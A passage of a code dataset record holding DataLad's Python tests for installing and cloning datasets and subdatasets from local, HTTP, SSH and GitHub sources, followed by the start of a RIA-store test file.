\"annex\"))\n src_ds.save(['INFO.txt', 'test.dat'], to_git=True)\n if type_ == 'annex':\n src_ds.save('test-annex.dat', to_git=False)\n elif type_ == 'git':\n pass\n else:\n raise ValueError(\"'type' must be 'git' or 'annex'\")\n # equivalent repo on github:\n url = \"https://github.com/datalad/testrepo--basic--r1.git\"\n sources = [src_ds.path,\n get_local_file_url(src_ds.path, compatibility='git')]\n if not dl_cfg.get('datalad.tests.nonetwork'):\n sources.append(url)\n\n for src in sources:\n origin = Dataset(path)\n\n # now install it somewhere else\n ds = install(path, source=src, description='mydummy')\n eq_(ds.path, path)\n ok_(ds.is_installed())\n if not isinstance(origin.repo, AnnexRepo):\n # this means it is a GitRepo\n ok_(isinstance(origin.repo, GitRepo))\n # stays plain Git repo\n ok_(isinstance(ds.repo, GitRepo))\n ok_(not isinstance(ds.repo, AnnexRepo))\n ok_(GitRepo.is_valid_repo(ds.path))\n files = ds.repo.get_indexed_files()\n assert_in('test.dat', files)\n assert_in('INFO.txt', files)\n assert_repo_status(path, annex=False)\n else:\n # must be an annex\n ok_(isinstance(ds.repo, AnnexRepo))\n ok_(AnnexRepo.is_valid_repo(ds.path, allow_noninitialized=False))\n files = ds.repo.get_indexed_files()\n assert_in('test.dat', files)\n assert_in('INFO.txt', files)\n assert_in('test-annex.dat', files)\n assert_repo_status(path, annex=True)\n # no content was installed:\n ok_(not ds.repo.file_has_content('test-annex.dat'))\n uuid_before = ds.repo.uuid\n ok_(uuid_before) # we actually have an uuid\n eq_(ds.repo.get_description(), 'mydummy')\n\n # installing it again, shouldn't matter:\n res = install(path, source=src, result_xfm=None, return_type='list')\n assert_status('notneeded', res)\n ok_(ds.is_installed())\n if isinstance(origin.repo, AnnexRepo):\n eq_(uuid_before, ds.repo.uuid)\n\n # cleanup before next iteration\n rmtree(path)\n\n\n@known_failure_githubci_win\n@with_tree(tree={'test.dat': \"doesn't matter\",\n 'INFO.txt': \"some info\",\n 'test-annex.dat': \"irrelevant\"})\n@with_tempfile\ndef test_install_dataset_from_just_source(src_repo=None, path=None):\n\n src_ds = Dataset(src_repo).create(result_renderer='disabled', force=True)\n src_ds.save(['INFO.txt', 'test.dat'], to_git=True)\n src_ds.save('test-annex.dat', to_git=False)\n # equivalent repo on github:\n src_url = \"https://github.com/datalad/testrepo--basic--r1.git\"\n sources = [src_ds.path,\n get_local_file_url(src_ds.path, compatibility='git')]\n if not dl_cfg.get('datalad.tests.nonetwork'):\n sources.append(src_url)\n\n for url in sources:\n\n with chpwd(path, mkdir=True):\n ds = install(source=url)\n\n ok_startswith(ds.path, path)\n ok_(ds.is_installed())\n ok_(GitRepo.is_valid_repo(ds.path))\n assert_repo_status(ds.path, annex=None)\n assert_in('INFO.txt', ds.repo.get_indexed_files())\n\n # cleanup before next iteration\n rmtree(path)\n\n\n@with_tree(tree={'test.dat': \"doesn't matter\",\n 'INFO.txt': \"some info\",\n 'test-annex.dat': \"irrelevant\"})\n@with_tempfile(mkdir=True)\ndef test_install_dataset_from_instance(src=None, dst=None):\n origin = Dataset(src).create(result_renderer='disabled', force=True)\n origin.save(['INFO.txt', 'test.dat'], to_git=True)\n origin.save('test-annex.dat', to_git=False)\n\n clone = install(source=origin, path=dst)\n\n assert_is_instance(clone, Dataset)\n ok_startswith(clone.path, dst)\n ok_(clone.is_installed())\n ok_(GitRepo.is_valid_repo(clone.path))\n assert_repo_status(clone.path, annex=None)\n assert_in('INFO.txt', clone.repo.get_indexed_files())\n\n\n@known_failure_githubci_win\n@skip_if_no_network\n@with_tempfile\ndef test_install_dataset_from_just_source_via_path(path=None):\n # for remote urls only, the source could be given to `path`\n # to allows for simplistic cmdline calls\n\n url = \"https://github.com/datalad/testrepo--basic--r1.git\"\n\n with chpwd(path, mkdir=True):\n ds = install(url)\n\n ok_startswith(ds.path, path)\n ok_(ds.is_installed())\n ok_(GitRepo.is_valid_repo(ds.path))\n assert_repo_status(ds.path, annex=None)\n assert_in('INFO.txt', ds.repo.get_indexed_files())\n\n\n@with_tree(tree={\n 'ds': {'test.txt': 'some'},\n })\n@serve_path_via_http\n@with_tempfile(mkdir=True)\ndef test_install_dataladri(src=None, topurl=None, path=None):\n # make plain git repo\n ds_path = opj(src, 'ds')\n gr = GitRepo(ds_path, create=True)\n gr.add('test.txt')\n gr.commit('demo')\n Runner(cwd=gr.path).run(['git', 'update-server-info'])\n # now install it somewhere else\n with patch('datalad.consts.DATASETS_TOPURL', topurl), \\\n swallow_logs():\n ds = install(path, source='///ds')\n eq_(ds.path, path)\n assert_repo_status(path, annex=False)\n ok_file_has_content(opj(path, 'test.txt'), 'some')\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_install_recursive(src=None, path_nr=None, path_r=None):\n\n _make_dataset_hierarchy(src)\n\n # first install non-recursive:\n ds = install(path_nr, source=src, recursive=False)\n ok_(ds.is_installed())\n for sub in ds.subdatasets(recursive=True, result_xfm='datasets'):\n ok_(not sub.is_installed(),\n \"Unintentionally installed: %s\" % (sub,))\n # this also means, subdatasets to be listed as absent:\n eq_(set(ds.subdatasets(recursive=True, state='absent', result_xfm='relpaths')),\n {'sub1'})\n\n # now recursively:\n # don't filter implicit results so we can inspect them\n res = install(path_r, source=src, recursive=True,\n result_xfm=None, result_filter=None)\n # installed a dataset and four subdatasets\n assert_result_count(res, 5, action='install', type='dataset')\n # we recurse top down during installation, so toplevel should appear at\n # first position in returned list\n eq_(res[0]['path'], path_r)\n top_ds = Dataset(res[0]['path'])\n ok_(top_ds.is_installed())\n\n # the subdatasets are contained in returned list:\n # (Note: Until we provide proper (singleton) instances for Datasets,\n # need to check for their paths)\n assert_in_results(res, path=opj(top_ds.path, 'sub1'), type='dataset')\n assert_in_results(res, path=opj(top_ds.path, 'sub1', 'sub2'),\n type='dataset')\n assert_in_results(res, path=opj(top_ds.path, 'sub1', 'sub2', 'sub3'),\n type='dataset')\n assert_in_results(res, path=opj(top_ds.path, 'sub1', 'sub2', 'sub3',\n 'sub4'),\n type='dataset')\n\n eq_(len(top_ds.subdatasets(recursive=True)), 4)\n\n for subds in top_ds.subdatasets(recursive=True, result_xfm='datasets'):\n ok_(subds.is_installed(),\n \"Not installed: %s\" % (subds,))\n # no content was installed:\n ainfo = subds.repo.get_content_annexinfo(init=None,\n eval_availability=True)\n assert_false(any(st[\"has_content\"] for st in ainfo.values()))\n # no absent subdatasets:\n ok_(top_ds.subdatasets(recursive=True, state='absent') == [])\n\n # check if we can install recursively into a dataset\n # https://github.com/datalad/datalad/issues/2982\n subds = ds.install('recursive-in-ds', source=src, recursive=True)\n ok_(subds.is_installed())\n for subsub in subds.subdatasets(recursive=True, result_xfm='datasets'):\n ok_(subsub.is_installed())\n\n # check that we get subdataset instances manufactured from notneeded results\n # to install existing subdatasets again\n eq_(subds, ds.install('recursive-in-ds'))\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_install_recursive_with_data(src=None, path=None):\n\n _make_dataset_hierarchy(src)\n\n # now again; with data:\n res = install(path, source=src, recursive=True, get_data=True,\n result_filter=None, result_xfm=None)\n assert_status('ok', res)\n # installed a dataset and two subdatasets, and one file with content in\n # each\n assert_result_count(res, 5, type='dataset', action='install')\n assert_result_count(res, 2, type='file', action='get')\n # we recurse top down during installation, so toplevel should appear at\n # first position in returned list\n eq_(res[0]['path'], path)\n top_ds = YieldDatasets()(res[0])\n ok_(top_ds.is_installed())\n\n def all_have_content(repo):\n ainfo = repo.get_content_annexinfo(init=None, eval_availability=True)\n return all(st[\"has_content\"] for st in ainfo.values())\n\n if isinstance(top_ds.repo, AnnexRepo):\n ok_(all_have_content(top_ds.repo))\n\n for subds in top_ds.subdatasets(recursive=True, result_xfm='datasets'):\n ok_(subds.is_installed(), \"Not installed: %s\" % (subds,))\n if isinstance(subds.repo, AnnexRepo):\n ok_(all_have_content(subds.repo))\n\n\n@with_tree(tree={'test.dat': \"doesn't matter\",\n 'INFO.txt': \"some info\",\n 'test-annex.dat': \"irrelevant\"})\n# 'local-url', 'network'\n# TODO: Somehow annex gets confused while initializing installed ds, whose\n# .git/config show a submodule url \"file:///aaa/bbb%20b/...\"\n# this is delivered by with_testrepos as the url to clone\n@with_tempfile\ndef test_install_into_dataset(source=None, top_path=None):\n src_ds = Dataset(source).create(result_renderer='disabled', force=True)\n src_ds.save(['INFO.txt', 'test.dat'], to_git=True)\n src_ds.save('test-annex.dat', to_git=False)\n\n ds = create(top_path)\n assert_repo_status(ds.path)\n\n subds = ds.install(\"sub\", source=source)\n ok_(isdir(opj(subds.path, '.git')))\n ok_(subds.is_installed())\n assert_in('sub', ds.subdatasets(result_xfm='relpaths'))\n # sub is clean:\n assert_repo_status(subds.path, annex=None)\n # top is too:\n assert_repo_status(ds.path, annex=None)\n ds.save(message='addsub')\n # now it is:\n assert_repo_status(ds.path, annex=None)\n\n # but we could also save while installing and there should be no side-effect\n # of saving any other changes if we state to not auto-save changes\n # Create a dummy change\n create_tree(ds.path, {'dummy.txt': 'buga'})\n assert_repo_status(ds.path, untracked=['dummy.txt'])\n subds_ = ds.install(\"sub2\", source=source)\n eq_(subds_.path, opj(ds.path, \"sub2\")) # for paranoid yoh ;)\n assert_repo_status(ds.path, untracked=['dummy.txt'])\n\n # and we should achieve the same behavior if we create a dataset\n # and then decide to add it\n create(_path_(top_path, 'sub3'))\n assert_repo_status(ds.path, untracked=['dummy.txt', 'sub3/'])\n ds.save('sub3')\n assert_repo_status(ds.path, untracked=['dummy.txt'])\n\n\n@slow # 15sec on Yarik's laptop\n@usecase # 39.3074s\n@skip_if_no_network\n@with_tempfile\ndef test_failed_install_multiple(top_path=None):\n ds = create(top_path)\n\n create(_path_(top_path, 'ds1'))\n create(_path_(top_path, 'ds3'))\n assert_repo_status(ds.path, annex=None, untracked=['ds1/', 'ds3/'])\n\n # specify install with multiple paths and one non-existing\n with assert_raises(IncompleteResultsError) as cme:\n ds.install(['ds1', 'ds2', '///crcns', '///nonexisting', 'ds3'],\n on_failure='continue')\n\n # install doesn't add existing submodules -- add does that\n assert_repo_status(ds.path, annex=None, untracked=['ds1/', 'ds3/'])\n ds.save(['ds1', 'ds3'])\n assert_repo_status(ds.path, annex=None)\n # those which succeeded should be saved now\n eq_(ds.subdatasets(result_xfm='relpaths'), ['crcns', 'ds1', 'ds3'])\n # and those which didn't -- listed\n eq_(set(r.get('source_url', r['path']) for r in cme.value.failed),\n {'///nonexisting', _path_(top_path, 'ds2')})\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_install_known_subdataset(src=None, path=None):\n\n _mk_submodule_annex(src, fname=\"test-annex.dat\", fcontent=\"whatever\")\n\n # get the superdataset:\n ds = install(path, source=src)\n # subdataset not installed:\n subds = Dataset(opj(path, 'subm 1'))\n assert_false(subds.is_installed())\n assert_in('subm 1', ds.subdatasets(state='absent', result_xfm='relpaths'))\n assert_not_in('subm 1', ds.subdatasets(state='present', result_xfm='relpaths'))\n # install it:\n ds.install('subm 1')\n ok_(subds.is_installed())\n ok_(AnnexRepo.is_valid_repo(subds.path, allow_noninitialized=False))\n # Verify that it is the correct submodule installed and not\n # new repository initiated\n assert_in(\"test-annex.dat\", subds.repo.get_indexed_files()),\n assert_not_in('subm 1', ds.subdatasets(state='absent', result_xfm='relpaths'))\n assert_in('subm 1', ds.subdatasets(state='present', result_xfm='relpaths'))\n\n # now, get the data by reinstalling with -g:\n ok_(subds.repo.file_has_content('test-annex.dat') is False)\n with chpwd(ds.path):\n result = get(path='subm 1', dataset=os.curdir)\n assert_in_results(result, path=opj(subds.path, 'test-annex.dat'))\n ok_(subds.repo.file_has_content('test-annex.dat') is True)\n ok_(subds.is_installed())\n\n\n@slow # 46.3650s\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_implicit_install(src=None, dst=None):\n\n origin_top = create(src)\n origin_sub = origin_top.create(\"sub\")\n origin_subsub = origin_sub.create(\"subsub\")\n with open(opj(origin_top.path, \"file1.txt\"), \"w\") as f:\n f.write(\"content1\")\n origin_top.save(\"file1.txt\")\n with open(opj(origin_sub.path, \"file2.txt\"), \"w\") as f:\n f.write(\"content2\")\n origin_sub.save(\"file2.txt\")\n with open(opj(origin_subsub.path, \"file3.txt\"), \"w\") as f:\n f.write(\"content3\")\n origin_subsub.save(\"file3.txt\")\n origin_top.save(recursive=True)\n\n # first, install toplevel:\n ds = install(dst, source=src)\n ok_(ds.is_installed())\n\n sub = Dataset(opj(ds.path, \"sub\"))\n ok_(not sub.is_installed())\n subsub = Dataset(opj(sub.path, \"subsub\"))\n ok_(not subsub.is_installed())\n\n # fail on obscure non-existing one\n assert_raises(IncompleteResultsError, ds.install, source='obscure')\n\n # install 3rd level and therefore implicitly the 2nd:\n result = ds.install(path=opj(\"sub\", \"subsub\"))\n ok_(sub.is_installed())\n ok_(subsub.is_installed())\n # but by default implicit results are not reported\n eq_(result, subsub)\n\n # fail on obscure non-existing one in subds\n assert_raises(IncompleteResultsError, ds.install, source=opj('sub', 'obscure'))\n\n # clean up, the nasty way\n rmtree(dst, chmod_files=True)\n ok_(not exists(dst))\n\n # again first toplevel:\n ds = install(dst, source=src)\n ok_(ds.is_installed())\n sub = Dataset(opj(ds.path, \"sub\"))\n ok_(not sub.is_installed())\n subsub = Dataset(opj(sub.path, \"subsub\"))\n ok_(not subsub.is_installed())\n\n # now implicit but without an explicit dataset to install into\n # (deriving from CWD):\n with chpwd(dst):\n # don't ask for the file content to make return value comparison\n # simpler\n result = get(path=opj(\"sub\", \"subsub\"), get_data=False, result_xfm='datasets')\n ok_(sub.is_installed())\n ok_(subsub.is_installed())\n eq_(result, [sub, subsub])\n\n\n@with_tempfile(mkdir=True)\ndef test_failed_install(dspath=None):\n ds = create(dspath)\n assert_raises(IncompleteResultsError,\n ds.install,\n \"sub\",\n source=\"http://nonexistingreallyanything.datalad.org/bla\")\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_install_list(path=None, top_path=None):\n\n _mk_submodule_annex(path, fname=\"test-annex.dat\", fcontent=\"whatever\")\n\n # we want to be able to install several things, if these are known\n # (no 'source' allowed). Therefore first toplevel:\n ds = install(top_path, source=path, recursive=False)\n assert_not_in('annex.hardlink', ds.config)\n ok_(ds.is_installed())\n sub1 = Dataset(opj(top_path, 'subm 1'))\n sub2 = Dataset(opj(top_path, '2'))\n ok_(not sub1.is_installed())\n ok_(not sub2.is_installed())\n\n # fails, when `source` is passed:\n assert_raises(ValueError, ds.install,\n path=['subm 1', '2'],\n source='something')\n\n # now should work:\n result = ds.install(path=['subm 1', '2'], result_xfm='paths')\n ok_(sub1.is_installed())\n ok_(sub2.is_installed())\n eq_(set(result), {sub1.path, sub2.path})\n # and if we request it again via get, result should be empty\n get_result = ds.get(path=['subm 1', '2'], get_data=False)\n assert_status('notneeded', get_result)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_reckless(path=None, top_path=None):\n _mk_submodule_annex(path, fname=\"test-annex.dat\", fcontent=\"whatever\")\n\n ds = install(top_path, source=path, reckless=True)\n eq_(ds.config.get('annex.hardlink', None), 'true')\n eq_(ds.repo.repo_info()['untrusted repositories'][0]['here'], True)\n\n\n@with_tree(tree={'top_file.txt': 'some',\n 'sub 1': {'sub1file.txt': 'something else',\n 'subsub': {'subsubfile.txt': 'completely different',\n }\n },\n 'sub 2': {'sub2file.txt': 'meaningless',\n }\n })\n@with_tempfile(mkdir=True)\ndef test_install_recursive_repeat(src=None, path=None):\n top_src = Dataset(src).create(force=True)\n sub1_src = top_src.create('sub 1', force=True)\n sub2_src = top_src.create('sub 2', force=True)\n subsub_src = sub1_src.create('subsub', force=True)\n top_src.save(recursive=True)\n assert_repo_status(top_src.path)\n\n # install top level:\n top_ds = install(path, source=src)\n ok_(top_ds.is_installed() is True)\n sub1 = Dataset(opj(path, 'sub 1'))\n ok_(sub1.is_installed() is False)\n sub2 = Dataset(opj(path, 'sub 2'))\n ok_(sub2.is_installed() is False)\n subsub = Dataset(opj(path, 'sub 1', 'subsub'))\n ok_(subsub.is_installed() is False)\n\n # install again, now with data and recursive, but recursion_limit 1:\n result = get(path, dataset=path, recursive=True, recursion_limit=1,\n result_xfm='datasets')\n # top-level dataset was not reobtained\n assert_not_in(top_ds, result)\n assert_in(sub1, result)\n assert_in(sub2, result)\n assert_not_in(subsub, result)\n ok_(top_ds.repo.file_has_content('top_file.txt') is True)\n ok_(sub1.repo.file_has_content('sub1file.txt') is True)\n ok_(sub2.repo.file_has_content('sub2file.txt') is True)\n\n # install sub1 again, recursively and with data\n top_ds.install('sub 1', recursive=True, get_data=True)\n ok_(subsub.is_installed())\n ok_(subsub.repo.file_has_content('subsubfile.txt'))\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile\ndef test_install_skip_list_arguments(src=None, path=None, path_outside=None):\n _mk_submodule_annex(src, fname=\"test-annex.dat\", fcontent=\"whatever\")\n\n ds = install(path, source=src)\n ok_(ds.is_installed())\n\n # install a list with valid and invalid items:\n result = ds.install(\n path=['subm 1', 'not_existing', path_outside, '2'],\n get_data=False,\n on_failure='ignore', result_xfm=None, return_type='list')\n # good and bad results together\n ok_(isinstance(result, list))\n eq_(len(result), 4)\n # check that we have an 'impossible/error' status for both invalid args\n # but all the other tasks have been accomplished\n assert_result_count(\n result, 1, status='impossible', message=\"path does not exist\",\n path=opj(ds.path, 'not_existing'))\n assert_result_count(\n result, 1, status='error',\n message=(\"path not associated with dataset %s\", ds),\n path=path_outside)\n for sub in [Dataset(opj(path, 'subm 1')), Dataset(opj(path, '2'))]:\n assert_result_count(\n result, 1, status='ok',\n message=('Installed subdataset in order to get %s', sub.path))\n ok_(sub.is_installed())\n\n # return of get is always a list, by default, even if just one thing was gotten\n # in this case 'subm1' was already obtained above, so this will get this\n # content of the subdataset\n with assert_raises(IncompleteResultsError) as cme:\n ds.install(path=['subm 1', 'not_existing'])\n with assert_raises(IncompleteResultsError) as cme:\n ds.get(path=['subm 1', 'not_existing'])\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_install_skip_failed_recursive(src=None, path=None):\n _mk_submodule_annex(src, fname=\"test-annex.dat\", fcontent=\"whatever\")\n\n # install top level:\n ds = install(path, source=src)\n sub1 = Dataset(opj(path, 'subm 1'))\n sub2 = Dataset(opj(path, '2'))\n # sabotage recursive installation of 'subm 1' by polluting the target:\n with open(opj(path, 'subm 1', 'blocking.txt'), \"w\") as f:\n f.write(\"sdfdsf\")\n\n with swallow_logs(new_level=logging.WARNING) as cml:\n result = ds.get(\n os.curdir, recursive=True,\n on_failure='ignore', result_xfm=None)\n # toplevel dataset was in the house already\n assert_result_count(\n result, 0, path=ds.path, type='dataset')\n # subm 1 should fail to install. [1] since comes after '2' submodule\n assert_in_results(\n result, status='error', path=sub1.path, type='dataset',\n message='target path already exists and not empty, refuse to '\n 'clone into target path')\n assert_in_results(result, status='ok', path=sub2.path)\n\n\n@with_tree(tree={'top_file.txt': 'some',\n 'sub 1': {'sub1file.txt': 'something else',\n 'subsub': {'subsubfile.txt': 'completely different',\n }\n },\n 'sub 2': {'sub2file.txt': 'meaningless',\n }\n })\n@with_tempfile(mkdir=True)\ndef test_install_noautoget_data(src=None, path=None):\n subsub_src = Dataset(opj(src, 'sub 1', 'subsub')).create(force=True)\n sub1_src = Dataset(opj(src, 'sub 1')).create(force=True)\n sub2_src = Dataset(opj(src, 'sub 2')).create(force=True)\n top_src = Dataset(src).create(force=True)\n top_src.save(recursive=True)\n\n # install top level:\n # don't filter implicitly installed subdataset to check them for content\n cdss = install(path, source=src, recursive=True, result_filter=None)\n # there should only be datasets in the list of installed items,\n # and none of those should have any data for their annexed files yet\n for ds in cdss:\n ainfo = ds.repo.get_content_annexinfo(init=None,\n eval_availability=True)\n assert_false(any(st[\"has_content\"] for st in ainfo.values()))\n\n\n@with_tempfile\n@with_tempfile\ndef test_install_source_relpath(src=None, dest=None):\n ds1 = create(src)\n src_ = basename(src)\n with chpwd(dirname(src)):\n ds2 = install(dest, source=src_)\n\n\n@known_failure_windows #FIXME\n@integration # 41.2043s\n@with_tempfile\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef test_install_consistent_state(src=None, dest=None, dest2=None, dest3=None):\n # if we install a dataset, where sub-dataset \"went ahead\" in that branch,\n # while super-dataset was not yet updated (e.g. we installed super before)\n # then it is desired to get that default installed branch to get to the\n # position where previous location was pointing to.\n # It is indeed a mere heuristic which might not hold the assumption in some\n # cases, but it would work for most simple and thus mostly used ones\n ds1 = create(src)\n sub1 = ds1.create('sub1')\n\n def check_consistent_installation(ds):\n datasets = [ds] + list(\n map(Dataset, ds.subdatasets(recursive=True, state='present',\n result_xfm='paths')))\n assert len(datasets) == 2 # in this test\n for ds in datasets:\n # all of them should be in the default branch\n eq_(ds.repo.get_active_branch(), DEFAULT_BRANCH)\n # all of them should be clean, so sub should be installed in a \"version\"\n # as pointed by the super\n ok_(not ds.repo.dirty)\n\n dest_ds = install(dest, source=src)\n # now we progress sub1 by adding sub2\n subsub2 = sub1.create('sub2')\n\n # and progress subsub2 forward to stay really thorough\n put_file_under_git(subsub2.path, 'file.dat', content=\"data\")\n subsub2.save(message=\"added a file\") # above function does not commit\n\n # just installing a submodule -- apparently different code/logic\n # but also the same story should hold - we should install the version pointed\n # by the super, and stay all clean\n dest_sub1 = dest_ds.install('sub1')\n check_consistent_installation(dest_ds)\n\n # So now we have source super-dataset \"dirty\" with sub1 progressed forward\n # Our install should try to \"retain\" consistency of the installation\n # whenever possible.\n\n # install entire hierarchy without specifying dataset\n # no filter, we want full report\n dest2_ds = install(dest2, source=src, recursive=True, result_filter=None)\n check_consistent_installation(dest2_ds[0]) # [1] is the subdataset\n\n # install entire hierarchy by first installing top level ds\n # and then specifying sub-dataset\n dest3_ds = install(dest3, source=src, recursive=False)\n # and then install both submodules recursively while pointing\n # to it based on dest3_ds\n dest3_ds.install('sub1', recursive=True)\n check_consistent_installation(dest3_ds)\n\n # TODO: makes a nice use-case for an update operation\n\n\n@skip_ssh\n@with_tempfile\n@with_tempfile\ndef test_install_subds_with_space(opath=None, tpath=None):\n ds = create(opath)\n ds.create('sub ds')\n # works even now, boring\n # install(tpath, source=opath, recursive=True)\n if on_windows:\n # on windows we cannot simply prepend datalad-test: to a path\n # and get a working sshurl...\n install(tpath, source=opath, recursive=True)\n else:\n # do via ssh!\n install(tpath, source=\"datalad-test:\" + opath, recursive=True)\n assert Dataset(opj(tpath, 'sub ds')).is_installed()\n\n\n# https://github.com/datalad/datalad/issues/2232\n@with_tempfile\n@with_tempfile\ndef test_install_from_tilda(opath=None, tpath=None):\n ds = create(opath)\n ds.create('sub ds')\n orelpath = os.path.join(\n '~',\n os.path.relpath(opath, os.path.expanduser('~'))\n )\n assert orelpath.startswith('~') # just to make sure no normalization\n install(tpath, source=orelpath, recursive=True)\n assert Dataset(opj(tpath, 'sub ds')).is_installed()\n\n\n@skip_if_on_windows # create_sibling incompatible with win servers\n@skip_ssh\n@usecase\n@with_tempfile(mkdir=True)\ndef test_install_subds_from_another_remote(topdir=None):\n # https://github.com/datalad/datalad/issues/1905\n from datalad.support.network import PathRI\n with chpwd(topdir):\n origin_ = 'origin'\n clone1_ = 'clone1'\n clone2_ = 'clone2'\n\n origin = create(origin_, annex=False)\n clone1 = install(source=origin, path=clone1_)\n # print(\"Initial clone\")\n clone1.create_sibling('ssh://datalad-test%s/%s' % (PathRI(getpwd()).posixpath, clone2_), name=clone2_)\n\n # print(\"Creating clone2\")\n clone1.push(to=clone2_)\n clone2 = Dataset(clone2_)\n # print(\"Initiating subdataset\")\n clone2.create('subds1')\n\n # print(\"Updating\")\n clone1.update(merge=True, sibling=clone2_)\n # print(\"Installing within updated dataset -- should be able to install from clone2\")\n clone1.install('subds1')\n\n\n# Takes > 2 sec\n# Do not use cassette\[email protected](\"suffix\", [\"\", \"/.git\"])\n@skip_if_no_network\n@with_tempfile\ndef test_datasets_datalad_org(tdir=None, *, suffix):\n # Test that git annex / datalad install, get work correctly on our datasets.datalad.org\n # Apparently things can break, especially with introduction of the\n # smart HTTP backend for apache2 etc\n ds = install(tdir, source='///dicoms/dartmouth-phantoms/bids_test6-PD+T2w' + suffix)\n eq_(ds.config.get(f'remote.{DEFAULT_REMOTE}.annex-ignore', None),\n None)\n # assert_result_count and not just assert_status since for some reason on\n # Windows we get two records due to a duplicate attempt (as res[1]) to get it\n # again, which is reported as \"notneeded\". For the purpose of this test\n # it doesn't make a difference.\n assert_result_count(\n ds.get(op.join('001-anat-scout_ses-{date}', '000001.dcm')),\n 1,\n status='ok')\n assert_status('ok', ds.drop(what='all', reckless='kill', recursive=True))\n\n\n# https://github.com/datalad/datalad/issues/3469\n@with_tempfile(mkdir=True)\ndef test_relpath_semantics(path=None):\n with chpwd(path):\n super = create('super')\n create('subsrc')\n sub = install(\n dataset='super', source='subsrc', path=op.join('super', 'sub'))\n eq_(sub.path, op.join(super.path, 'sub'))\n\n\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_install_branch(path=None, url=None):\n path = Path(path)\n ds_a = create(path / \"ds_a\")\n ds_a.create(\"sub\")\n\n repo_a = ds_a.repo\n repo_a.commit(msg=\"c1\", options=[\"--allow-empty\"])\n repo_a.checkout(DEFAULT_BRANCH + \"-other\", [\"-b\"])\n repo_a.commit(msg=\"c2\", options=[\"--allow-empty\"])\n repo_a.checkout(DEFAULT_BRANCH)\n\n # Clone from URL with custom branch specified should work\n assert ds_a.repo.call_git_success(['update-server-info'])\n tmp_path = path / \"tmp\"\n os.mkdir(tmp_path)\n with chpwd(tmp_path):\n ds_b = install(url + \"ds_a/.git\", branch=DEFAULT_BRANCH + \"-other\")\n repo_b = ds_b.repo\n eq_(repo_b.get_corresponding_branch() or repo_b.get_active_branch(),\n DEFAULT_BRANCH + \"-other\")\n\n ds_b = install(source=ds_a.path, path=str(path / \"ds_b\"),\n branch=DEFAULT_BRANCH + \"-other\", recursive=True)\n\n repo_b = ds_b.repo\n eq_(repo_b.get_corresponding_branch() or repo_b.get_active_branch(),\n DEFAULT_BRANCH + \"-other\")\n\n repo_sub = Dataset(ds_b.pathobj / \"sub\").repo\n eq_(repo_sub.get_corresponding_branch() or repo_sub.get_active_branch(),\n DEFAULT_BRANCH)\n\n\ndef _create_test_install_recursive_github(path): # pragma: no cover\n # to be ran once to populate a hierarchy of test datasets on github\n # Making it a full round-trip would require github credentials on CI etc\n ds = create(opj(path, \"testrepo gh\"))\n # making them with spaces and - to ensure that we consistently use the mapping\n # for create and for get/clone/install\n ds.create(\"sub _1\")\n ds.create(\"sub _1/d/sub_- 1\")\n import datalad.distribution.create_sibling_github # to bind API\n ds.create_sibling_github(\n \"testrepo gh\",\n github_organization='datalad',\n recursive=True,\n # yarik forgot to push first, \"replace\" is not working in non-interactive IIRC\n # existing='reconfigure'\n )\n return ds.push(recursive=True, to='github')\n\n\n@skip_if_no_network\n@with_tempfile(mkdir=True)\ndef test_install_recursive_github(path=None):\n # test recursive installation of a hierarchy of datasets created on github\n # using datalad create-sibling-github. Following invocation was used to poplate it\n #\n # out = _create_test_install_recursive_github(path)\n\n # \"testrepo gh\" was mapped by our sanitization in create_sibling_github to testrepo_gh, thus\n for i, url in enumerate([\n 'https://github.com/datalad/testrepo_gh',\n # optionally made available to please paranoids, but with all takes too long (22sec)\n #'https://github.com/datalad/testrepo_gh.git',\n #'[email protected]:datalad/testrepo_gh.git',\n ]):\n ds = install(source=url, path=opj(path, \"clone%i\" % i), recursive=True)\n eq_(len(ds.subdatasets(recursive=True, state='present')), 2)\n" }, { "alpha_fraction": 0.6244897842407227, "alphanum_fraction": 0.6270871758460999, "avg_line_length": 33.11392593383789, "blob_id": "46c819857730e4d16d5afb345a4a9f12ed793704", "content_id": "35fbae5888126257e277102a374a3b34c75e343e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2695, "license_type": "permissive", "max_line_length": 79, "num_lines": 79, "path": "/datalad/distributed/tests/test_ria.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"Test workflow (pieces) for RIA stores\"\"\"\n\nfrom datalad.api import (\n Dataset,\n clone,\n)\nfrom datalad.tests.utils_pytest import (\n DEFAULT_REMOTE,\n assert_equal,\n assert_result_count,\n assert_true,\n has_symlink_capability,\n skip_if,\n skip_if_on_windows,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import Path\n\n\n@skip_if_on_windows # currently all tests re RIA/ORA don't run on windows\n@skip_if(cond=not has_symlink_capability(),\n msg=\"skip testing ephemeral clone w/o symlink capabilities\")\n@with_tree({'file1.txt': 'some',\n 'sub': {'other.txt': 'other'}})\n@with_tempfile\n@with_tempfile\ndef test_ephemeral(ds_path=None, store_path=None, clone_path=None):\n\n dspath = Path(ds_path)\n store = Path(store_path)\n file_test = Path('file1.txt')\n file_testsub = Path('sub') / 'other.txt'\n\n\n # create the original dataset\n ds = Dataset(dspath)\n ds.create(force=True)\n ds.save()\n\n # put into store:\n ds.create_sibling_ria(\"ria+{}\".format(store.as_uri()), \"riastore\",\n new_store_ok=True)\n ds.push(to=\"riastore\", data=\"anything\")\n\n # now, get an ephemeral clone from the RIA store:\n eph_clone = clone('ria+{}#{}'.format(store.as_uri(), ds.id), clone_path,\n reckless=\"ephemeral\")\n\n # ephemeral clone was properly linked (store has bare repos!):\n clone_annex = (eph_clone.repo.dot_git / 'annex')\n assert_true(clone_annex.is_symlink())\n assert_true(clone_annex.resolve().samefile(\n store / ds.id[:3] / 